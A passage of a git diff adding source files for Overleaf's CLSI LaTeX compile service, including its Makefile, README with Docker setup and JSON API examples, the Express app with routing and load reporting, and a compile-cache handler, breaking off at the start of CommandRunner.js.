"copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. diff --git a/services/clsi/Makefile b/services/clsi/Makefile new file mode 100644 index 0000000..2f673db --- /dev/null +++ b/services/clsi/Makefile @@ -0,0 +1,158 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = clsi +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi gcr.io/overleaf-ops/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag gcr.io/overleaf-ops/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag gcr.io/overleaf-ops/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from gcr.io/overleaf-ops/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from gcr.io/overleaf-ops/$(PROJECT_NAME):main \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/clsi/README.md b/services/clsi/README.md new file mode 100644 index 0000000..16e40b8 --- /dev/null +++ b/services/clsi/README.md @@ -0,0 +1,188 @@ +overleaf/clsi +=============== + +A web api for compiling LaTeX documents in the cloud + +The Common LaTeX Service Interface (CLSI) provides a RESTful interface to traditional LaTeX tools (or, more generally, any command line tool for composing marked-up documents into a display format such as PDF or HTML). The CLSI listens on the following ports by default: + +* TCP/3013 - the RESTful interface +* TCP/3048 - reports load information +* TCP/3049 - HTTP interface to control the CLSI service + +These defaults can be modified in `config/settings.defaults.js`. + +The provided `Dockerfile` builds a Docker image which has the Docker command line tools installed. The configuration in `docker-compose-config.yml` mounts the Docker socket, in order that the CLSI container can talk to the Docker host it is running in. This allows it to spin up `sibling containers` running an image with a TeX distribution installed to perform the actual compiles. + +The CLSI can be configured through the following environment variables: + +* `ALLOWED_COMPILE_GROUPS` - Space separated list of allowed compile groups +* `ALLOWED_IMAGES` - Space separated list of allowed Docker TeX Live images +* `CATCH_ERRORS` - Set to `true` to log uncaught exceptions +* `COMPILE_GROUP_DOCKER_CONFIGS` - JSON string of Docker configs for compile groups +* `COMPILES_HOST_DIR` - Working directory for LaTeX compiles +* `OUTPUT_HOST_DIR` - Output directory for LaTeX compiles +* `COMPILE_SIZE_LIMIT` - Sets the body-parser [limit](https://github.com/expressjs/body-parser#limit) +* `DOCKER_RUNNER` - Set to true to use sibling containers +* `DOCKER_RUNTIME` - +* `FILESTORE_DOMAIN_OVERRIDE` - The url for the filestore service e.g.`http://$FILESTORE_HOST:3009` +* `FILESTORE_PARALLEL_FILE_DOWNLOADS` - Number of parallel file downloads +* `LISTEN_ADDRESS` - The address for the RESTful service to listen on. Set to `0.0.0.0` to listen on all network interfaces +* `PROCESS_LIFE_SPAN_LIMIT_MS` - Process life span limit in milliseconds +* `SMOKE_TEST` - Whether to run smoke tests +* `TEXLIVE_IMAGE` - The TeX Live Docker image to use for sibling containers, e.g. `gcr.io/overleaf-ops/texlive-full:2017.1` +* `TEX_LIVE_IMAGE_NAME_OVERRIDE` - The name of the registry for the Docker image e.g. `gcr.io/overleaf-ops` +* `TEXLIVE_IMAGE_USER` - When using sibling containers, the user to run as in the TeX Live image. Defaults to `tex` +* `TEXLIVE_OPENOUT_ANY` - Sets the `openout_any` environment variable for TeX Live (see the `\openout` primitive [documentation](http://tug.org/texinfohtml/web2c.html#tex-invocation)) + +Further environment variables configure the [metrics module](https://github.com/overleaf/metrics-module) + +Installation +------------ + +The CLSI can be installed and set up as part of the entire [Overleaf stack](https://github.com/overleaf/overleaf) (complete with front end editor and document storage), or it can be run as a standalone service. To run is as a standalone service, first checkout this repository: + +```shell +git clone git@github.com:overleaf/overleaf.git +``` + +Then build the Docker image: + +```shell +docker build . -t overleaf/clsi -f services/clsi/Dockerfile +``` + +Then pull the TeX Live image: + +```shell +docker pull texlive/texlive +``` + +Then start the Docker container: + +```shell +docker run --rm \ + -p 127.0.0.1:3013:3013 \ + -e LISTEN_ADDRESS=0.0.0.0 \ + -e DOCKER_RUNNER=true \ + -e TEXLIVE_IMAGE=texlive/texlive \ + -e TEXLIVE_IMAGE_USER=root \ + -e COMPILES_HOST_DIR="$PWD/compiles" \ + -v "$PWD/compiles:/overleaf/services/clsi/compiles" \ + -v "$PWD/cache:/overleaf/services/clsi/cache" \ + -v /var/run/docker.sock:/var/run/docker.sock \ + --name clsi \ + overleaf/clsi +``` + +Note: if you're running the CLSI in macOS you may need to use `-v /var/run/docker.sock.raw:/var/run/docker.sock` instead. + +The CLSI should then be running at + +Important note for Linux users +============================== + +The Node application runs as user `node` in the CLSI, which has uid `1000`. As a consequence of this, the `compiles` folder gets created on your host with `uid` and `gid` set to `1000`. + +```shell +ls -lnd compiles +``` +> `drwxr-xr-x 2 1000 1000 4096 Mar 19 12:41 compiles` + +If there is a user/group on your host which also happens to have `uid` / `gid` `1000` then that user/group will have ownership of the compiles folder on your host. + +LaTeX runs in the sibling containers as the user specified in the `TEXLIVE_IMAGE_USER` environment variable. In the example above this is set to `root`, which has uid `0`. This creates a problem with the above permissions, as the root user does not have permission to write to subfolders of `compiles`. + +A quick fix is to give the `root` group ownership and read write permissions to `compiles`, with `setgid` set so that new subfolders also inherit this ownership: + +```shell +sudo chown -R 1000:root compiles +sudo chmod -R g+w compiles +sudo chmod g+s compiles +``` + +Another solution is to create a `overleaf` group and add both `root` and the user with `uid` `1000` to it. If the host does not have a user with that `uid`, you will need to create one first. + +```shell +sudo useradd --uid 1000 host-node-user # If required +sudo groupadd overleaf +sudo usermod -a -G overleaf root +sudo usermod -a -G overleaf $(id -nu 1000) +sudo chown -R 1000:overleaf compiles +sudo chmod -R g+w compiles +sudo chmod g+s compiles +``` + +This is a facet of the way docker works on Linux. See this [upstream issue](https://github.com/moby/moby/issues/7198) + + +API +--- + +The CLSI is based on a JSON API. + +#### Example Request + +(Note that valid JSON should not contain any comments like the example below). + + POST /project//compile + +```json5 +{ + "compile": { + "options": { + // Which compiler to use. Can be latex, pdflatex, xelatex or lualatex + "compiler": "lualatex", + // How many seconds to wait before killing the process. Default is 60. + "timeout": 40 + }, + // The main file to run LaTeX on + "rootResourcePath": "main.tex", + // An array of files to include in the compilation. May have either the content + // passed directly, or a URL where it can be downloaded. + "resources": [ + { + "path": "main.tex", + "content": "\\documentclass{article}\n\\begin{document}\nHello World\n\\end{document}" + } + // ,{ + // "path": "image.png", + // "url": "www.example.com/image.png", + // "modified": 123456789 // Unix time since epoch + // } + ] + } +} +``` + +With `curl`, if you place the above JSON in a file called `data.json`, the request would look like this: + +```shell +curl -X POST -H 'Content-Type: application/json' -d @data.json http://localhost:3013/project//compile +``` + +You can specify any project-id in the URL, and the files and LaTeX environment will be persisted between requests. +URLs will be downloaded and cached until provided with a more recent modified date. + +#### Example Response + +```json +{ + "compile": { + "status": "success", + "outputFiles": [{ + "type": "pdf", + "url": "http://localhost:3013/project//output/output.pdf" + }, { + "type": "log", + "url": "http://localhost:3013/project//output/output.log" + }] + } +} +``` + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2014-2021. diff --git a/services/clsi/app.js b/services/clsi/app.js new file mode 100644 index 0000000..8de9d89 --- /dev/null +++ b/services/clsi/app.js @@ -0,0 +1,386 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const CompileController = require('./app/js/CompileController') +const ContentController = require('./app/js/ContentController') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +logger.initialize('clsi') +const Metrics = require('@overleaf/metrics') + +const smokeTest = require('./test/smoke/js/SmokeTests') +const ContentTypeMapper = require('./app/js/ContentTypeMapper') +const Errors = require('./app/js/Errors') +const { createOutputZip } = require('./app/js/OutputController') + +const Path = require('node:path') + +Metrics.open_sockets.monitor(true) +Metrics.memory.monitor(logger) +Metrics.leaked_sockets.monitor(logger) + +const ProjectPersistenceManager = require('./app/js/ProjectPersistenceManager') +const OutputCacheManager = require('./app/js/OutputCacheManager') +const ContentCacheManager = require('./app/js/ContentCacheManager') + +ProjectPersistenceManager.init() +OutputCacheManager.init() + +const express = require('express') +const bodyParser = require('body-parser') +const app = express() + +Metrics.injectMetricsRoute(app) +app.use(Metrics.http.monitor(logger)) + +// Compile requests can take longer than the default two +// minutes (including file download time), so bump up the +// timeout a bit. +const TIMEOUT = 10 * 60 * 1000 +app.use(function (req, res, next) { + req.setTimeout(TIMEOUT) + res.setTimeout(TIMEOUT) + res.removeHeader('X-Powered-By') + next() +}) + +app.param('project_id', function (req, res, next, projectId) { + if (projectId?.match(/^[a-zA-Z0-9_-]+$/)) { + next() + } else { + next(new Error('invalid project id')) + } +}) + +app.param('user_id', function (req, res, next, userId) { + if (userId?.match(/^[0-9a-f]{24}$/)) { + next() + } else { + next(new Error('invalid user id')) + } +}) + +app.param('build_id', function (req, res, next, buildId) { + if (buildId?.match(OutputCacheManager.BUILD_REGEX)) { + next() + } else { + next(new Error(`invalid build id ${buildId}`)) + } +}) + +app.param('contentId', function (req, res, next, contentId) { + if (contentId?.match(OutputCacheManager.CONTENT_REGEX)) { + next() + } else { + next(new Error(`invalid content id ${contentId}`)) + } +}) + +app.param('hash', function (req, res, next, hash) { + if (hash?.match(ContentCacheManager.HASH_REGEX)) { + next() + } else { + next(new Error(`invalid hash ${hash}`)) + } +}) + +app.post( + '/project/:project_id/compile', + bodyParser.json({ limit: Settings.compileSizeLimit }), + CompileController.compile +) +app.post('/project/:project_id/compile/stop', CompileController.stopCompile) +app.delete('/project/:project_id', CompileController.clearCache) + +app.get('/project/:project_id/sync/code', CompileController.syncFromCode) +app.get('/project/:project_id/sync/pdf', CompileController.syncFromPdf) +app.get('/project/:project_id/wordcount', CompileController.wordcount) +app.get('/project/:project_id/status', CompileController.status) +app.post('/project/:project_id/status', CompileController.status) + +// Per-user containers +app.post( + '/project/:project_id/user/:user_id/compile', + bodyParser.json({ limit: Settings.compileSizeLimit }), + CompileController.compile +) +app.post( + '/project/:project_id/user/:user_id/compile/stop', + CompileController.stopCompile +) +app.delete('/project/:project_id/user/:user_id', CompileController.clearCache) + +app.get( + '/project/:project_id/user/:user_id/sync/code', + CompileController.syncFromCode +) +app.get( + '/project/:project_id/user/:user_id/sync/pdf', + CompileController.syncFromPdf +) +app.get( + '/project/:project_id/user/:user_id/wordcount', + CompileController.wordcount +) + +const ForbidSymlinks = require('./app/js/StaticServerForbidSymlinks') + +// create a static server which does not allow access to any symlinks +// avoids possible mismatch of root directory between middleware check +// and serving the files +const staticOutputServer = ForbidSymlinks( + express.static, + Settings.path.outputDir, + { + setHeaders(res, path, stat) { + if (Path.basename(path) === 'output.pdf') { + // Calculate an etag in the same way as nginx + // https://github.com/tj/send/issues/65 + const etag = (path, stat) => + `"${Math.ceil(+stat.mtime / 1000).toString(16)}` + + '-' + + Number(stat.size).toString(16) + + '"' + res.set('Etag', etag(path, stat)) + } + res.set('Content-Type', ContentTypeMapper.map(path)) + }, + } +) + +// This needs to be before GET /project/:project_id/build/:build_id/output/* +app.get( + '/project/:project_id/build/:build_id/output/output.zip', + bodyParser.json(), + createOutputZip +) + +// This needs to be before GET /project/:project_id/user/:user_id/build/:build_id/output/* +app.get( + '/project/:project_id/user/:user_id/build/:build_id/output/output.zip', + bodyParser.json(), + createOutputZip +) + +app.get( + '/project/:project_id/user/:user_id/build/:build_id/output/*', + function (req, res, next) { + // for specific build get the path from the OutputCacheManager (e.g. .clsi/buildId) + req.url = + `/${req.params.project_id}-${req.params.user_id}/` + + OutputCacheManager.path(req.params.build_id, `/${req.params[0]}`) + staticOutputServer(req, res, next) + } +) + +app.get( + '/project/:projectId/content/:contentId/:hash', + ContentController.getPdfRange +) +app.get( + '/project/:projectId/user/:userId/content/:contentId/:hash', + ContentController.getPdfRange +) + +app.get( + '/project/:project_id/build/:build_id/output/*', + function (req, res, next) { + // for specific build get the path from the OutputCacheManager (e.g. .clsi/buildId) + req.url = + `/${req.params.project_id}/` + + OutputCacheManager.path(req.params.build_id, `/${req.params[0]}`) + staticOutputServer(req, res, next) + } +) + +app.get('/oops', function (req, res, next) { + logger.error({ err: 'hello' }, 'test error') + res.send('error\n') +}) + +app.get('/oops-internal', function (req, res, next) { + setTimeout(function () { + throw new Error('Test error') + }, 1) +}) + +app.get('/status', (req, res, next) => res.send('CLSI is alive\n')) + +Settings.processTooOld = false +if (Settings.processLifespanLimitMs) { + // Pre-emp instances have a maximum lifespan of 24h after which they will be + // shutdown, with a 30s grace period. + // Spread cycling of VMs by up-to 2.4h _before_ their limit to avoid large + // numbers of VMs that are temporarily unavailable (while they reboot). + Settings.processLifespanLimitMs -= + Settings.processLifespanLimitMs * (Math.random() / 10) + logger.info( + { target: new Date(Date.now() + Settings.processLifespanLimitMs) }, + 'Lifespan limited' + ) + + setTimeout(() => { + logger.info({}, 'shutting down, process is too old') + Settings.processTooOld = true + }, Settings.processLifespanLimitMs) +} + +function runSmokeTest() { + if (Settings.processTooOld) return + const INTERVAL = 30 * 1000 + if ( + smokeTest.lastRunSuccessful() && + CompileController.timeSinceLastSuccessfulCompile() < INTERVAL / 2 + ) { + logger.debug('skipping smoke tests, got recent successful user compile') + return setTimeout(runSmokeTest, INTERVAL / 2) + } + logger.debug('running smoke tests') + smokeTest.triggerRun(err => { + if (err) logger.error({ err }, 'smoke tests failed') + setTimeout(runSmokeTest, INTERVAL) + }) +} +if (Settings.smokeTest) { + runSmokeTest() +} + +app.get('/health_check', function (req, res) { + if (Settings.processTooOld) { + return res.status(500).json({ processTooOld: true }) + } + smokeTest.sendLastResult(res) +}) + +app.get('/smoke_test_force', (req, res) => smokeTest.sendNewResult(res)) + +app.use(function (error, req, res, next) { + if (error instanceof Errors.NotFoundError) { + logger.debug({ err: error, url: req.url }, 'not found error') + res.sendStatus(404) + } else if (error instanceof Errors.InvalidParameter) { + res.status(400).send(error.message) + } else if (error.code === 'EPIPE') { + // inspect container returns EPIPE when shutting down + res.sendStatus(503) // send 503 Unavailable response + } else { + logger.error({ err: error, url: req.url }, 'server error') + res.sendStatus(error.statusCode || 500) + } +}) + +const net = require('node:net') +const os = require('node:os') + +let STATE = 'up' + +const loadTcpServer = net.createServer(function (socket) { + socket.on('error', function (err) { + if (err.code === 'ECONNRESET') { + // this always comes up, we don't know why + return + } + logger.err({ err }, 'error with socket on load check') + socket.destroy() + }) + + if (STATE === 'up' && Settings.internal.load_balancer_agent.report_load) { + let availableWorkingCpus + const currentLoad = os.loadavg()[0] + + // staging clis's have 1 cpu core only + if (os.cpus().length === 1) { + availableWorkingCpus = 1 + } else { + availableWorkingCpus = os.cpus().length - 1 + } + + const freeLoad = availableWorkingCpus - currentLoad + const freeLoadPercentage = Math.round( + (freeLoad / availableWorkingCpus) * 100 + ) + if ( + Settings.internal.load_balancer_agent.allow_maintenance && + freeLoadPercentage <= 0 + ) { + // When its 0 the server is set to drain implicitly. + // Drain will move new projects to different servers. + // Drain will keep existing projects assigned to the same server. + // Maint will more existing and new projects to different servers. + socket.write(`maint, 0%\n`, 'ASCII') + } else { + // Ready will cancel the maint state. + socket.write(`up, ready, ${Math.max(freeLoadPercentage, 1)}%\n`, 'ASCII') + if (freeLoadPercentage <= 0) { + // This metric records how often we would have gone into maintenance mode. + Metrics.inc('clsi-prevented-maint') + } + } + socket.end() + } else { + socket.write(`${STATE}\n`, 'ASCII') + socket.end() + } +}) + +const loadHttpServer = express() + +loadHttpServer.post('/state/up', function (req, res, next) { + STATE = 'up' + logger.debug('getting message to set server to down') + res.sendStatus(204) +}) + +loadHttpServer.post('/state/down', function (req, res, next) { + STATE = 'down' + logger.debug('getting message to set server to down') + res.sendStatus(204) +}) + +loadHttpServer.post('/state/maint', function (req, res, next) { + STATE = 'maint' + logger.debug('getting message to set server to maint') + res.sendStatus(204) +}) + +const port = Settings.internal.clsi.port +const host = Settings.internal.clsi.host + +const loadTcpPort = Settings.internal.load_balancer_agent.load_port +const loadHttpPort = Settings.internal.load_balancer_agent.local_port + +if (!module.parent) { + // Called directly + + // handle uncaught exceptions when running in production + if (Settings.catchErrors) { + process.removeAllListeners('uncaughtException') + process.on('uncaughtException', error => + logger.error({ err: error }, 'uncaughtException') + ) + } + + app.listen(port, host, error => { + if (error) { + logger.fatal({ error }, `Error starting CLSI on ${host}:${port}`) + } else { + logger.debug(`CLSI starting up, listening on ${host}:${port}`) + } + }) + + loadTcpServer.listen(loadTcpPort, host, function (error) { + if (error != null) { + throw error + } + logger.debug(`Load tcp agent listening on load port ${loadTcpPort}`) + }) + + loadHttpServer.listen(loadHttpPort, host, function (error) { + if (error != null) { + throw error + } + logger.debug(`Load http agent listening on load port ${loadHttpPort}`) + }) +} + +module.exports = app diff --git a/services/clsi/app/js/CLSICacheHandler.js b/services/clsi/app/js/CLSICacheHandler.js new file mode 100644 index 0000000..de6f512 --- /dev/null +++ b/services/clsi/app/js/CLSICacheHandler.js @@ -0,0 +1,276 @@ +const crypto = require('node:crypto') +const fs = require('node:fs') +const Path = require('node:path') +const { pipeline } = require('node:stream/promises') +const { createGzip, createGunzip } = require('node:zlib') +const tarFs = require('tar-fs') +const _ = require('lodash') +const { + fetchNothing, + fetchStream, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { CACHE_SUBDIR } = require('./OutputCacheManager') +const { isExtraneousFile } = require('./ResourceWriter') + +const TIMING_BUCKETS = [ + 0, 10, 100, 1000, 2000, 5000, 10000, 15000, 20000, 30000, +] +const MAX_ENTRIES_IN_OUTPUT_TAR = 100 + +/** + * @param {string} projectId + * @param {string} userId + * @param {string} buildId + * @param {string} editorId + * @param {[{path: string}]} outputFiles + * @param {string} compileGroup + * @param {Record} options + */ +function notifyCLSICacheAboutBuild({ + projectId, + userId, + buildId, + editorId, + outputFiles, + compileGroup, + options, +}) { + if (!Settings.apis.clsiCache.enabled) return + + /** + * @param {[{path: string}]} files + */ + const enqueue = files => { + Metrics.count('clsi_cache_enqueue_files', files.length) + fetchNothing(`${Settings.apis.clsiCache.url}/enqueue`, { + method: 'POST', + json: { + projectId, + userId, + buildId, + editorId, + files, + downloadHost: Settings.apis.clsi.downloadHost, + clsiServerId: Settings.apis.clsi.clsiServerId, + compileGroup, + options, + }, + signal: AbortSignal.timeout(15_000), + }).catch(err => { + logger.warn( + { err, projectId, userId, buildId }, + 'enqueue for clsi cache failed' + ) + }) + } + + // PDF preview + enqueue( + outputFiles + .filter( + f => + f.path === 'output.pdf' || + f.path === 'output.log' || + f.path === 'output.synctex.gz' || + f.path.endsWith('.blg') + ) + .map(f => { + if (f.path === 'output.pdf') { + return _.pick(f, 'path', 'size', 'contentId', 'ranges') + } + return _.pick(f, 'path') + }) + ) + + // Compile Cache + buildTarball({ projectId, userId, buildId, outputFiles }) + .then(() => { + enqueue([{ path: 'output.tar.gz' }]) + }) + .catch(err => { + logger.warn( + { err, projectId, userId, buildId }, + 'build output.tar.gz for clsi cache failed' + ) + }) +} + +/** + * @param {string} projectId + * @param {string} userId + * @param {string} buildId + * @param {[{path: string}]} outputFiles + * @return {Promise} + */ +async function buildTarball({ projectId, userId, buildId, outputFiles }) { + const timer = new Metrics.Timer('clsi_cache_build', 1, {}, TIMING_BUCKETS) + const outputDir = Path.join( + Settings.path.outputDir, + userId ? `${projectId}-${userId}` : projectId, + CACHE_SUBDIR, + buildId + ) + + const files = outputFiles.filter(f => !isExtraneousFile(f.path)) + if (files.length > MAX_ENTRIES_IN_OUTPUT_TAR) { + Metrics.inc('clsi_cache_build_too_many_entries') + throw new Error('too many output files for output.tar.gz') + } + Metrics.count('clsi_cache_build_files', files.length) + + const path = Path.join(outputDir, 'output.tar.gz') + try { + await pipeline( + tarFs.pack(outputDir, { entries: files.map(f => f.path) }), + createGzip(), + fs.createWriteStream(path) + ) + } catch (err) { + try { + await fs.promises.unlink(path) + } catch (e) {} + throw err + } finally { + timer.done() + } +} + +/** + * @param {string} projectId + * @param {string} userId + * @param {string} editorId + * @param {string} buildId + * @param {string} outputDir + * @return {Promise} + */ +async function downloadOutputDotSynctexFromCompileCache( + projectId, + userId, + editorId, + buildId, + outputDir +) { + if (!Settings.apis.clsiCache.enabled) return false + + const timer = new Metrics.Timer( + 'clsi_cache_download', + 1, + { method: 'synctex' }, + TIMING_BUCKETS + ) + let stream + try { + stream = await fetchStream( + `${Settings.apis.clsiCache.url}/project/${projectId}/${ + userId ? `user/${userId}/` : '' + }build/${editorId}-${buildId}/search/output/output.synctex.gz`, + { + method: 'GET', + signal: AbortSignal.timeout(10_000), + } + ) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + timer.done({ status: 'not-found' }) + return false + } + timer.done({ status: 'error' }) + throw err + } + await fs.promises.mkdir(outputDir, { recursive: true }) + const dst = Path.join(outputDir, 'output.synctex.gz') + const tmp = dst + crypto.randomUUID() + try { + await pipeline(stream, fs.createWriteStream(tmp)) + await fs.promises.rename(tmp, dst) + } catch (err) { + try { + await fs.promises.unlink(tmp) + } catch {} + throw err + } + timer.done({ status: 'success' }) + return true +} + +/** + * @param {string} projectId + * @param {string} userId + * @param {string} compileDir + * @return {Promise} + */ +async function downloadLatestCompileCache(projectId, userId, compileDir) { + if (!Settings.apis.clsiCache.enabled) return false + + const url = `${Settings.apis.clsiCache.url}/project/${projectId}/${ + userId ? `user/${userId}/` : '' + }latest/output/output.tar.gz` + const timer = new Metrics.Timer( + 'clsi_cache_download', + 1, + { method: 'tar' }, + TIMING_BUCKETS + ) + let stream + try { + stream = await fetchStream(url, { + method: 'GET', + signal: AbortSignal.timeout(10_000), + }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + timer.done({ status: 'not-found' }) + return false + } + timer.done({ status: 'error' }) + throw err + } + let n = 0 + let abort = false + await pipeline( + stream, + createGunzip(), + tarFs.extract(compileDir, { + // use ignore hook for counting entries (files+folders) and validation. + // Include folders as they incur mkdir calls. + ignore(_, header) { + if (abort) return true // log once + n++ + if (n > MAX_ENTRIES_IN_OUTPUT_TAR) { + abort = true + logger.warn( + { + url, + compileDir, + }, + 'too many entries in tar-ball from clsi-cache' + ) + } else if (header.type !== 'file' && header.type !== 'directory') { + abort = true + logger.warn( + { + url, + compileDir, + entryType: header.type, + }, + 'unexpected entry in tar-ball from clsi-cache' + ) + } + return abort + }, + }) + ) + Metrics.count('clsi_cache_download_entries', n) + timer.done({ status: 'success' }) + return !abort +} + +module.exports = { + notifyCLSICacheAboutBuild, + downloadLatestCompileCache, + downloadOutputDotSynctexFromCompileCache, +} diff --git a/services/clsi/app/js/CommandRunner.js b/services/clsi/app/js/CommandRunner.js new file mode 100644 index 0000000..61d58dd --- /dev/null +++ b/services/clsi/app/js/CommandRunner.js @@ -0,0 +1,20 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS207: 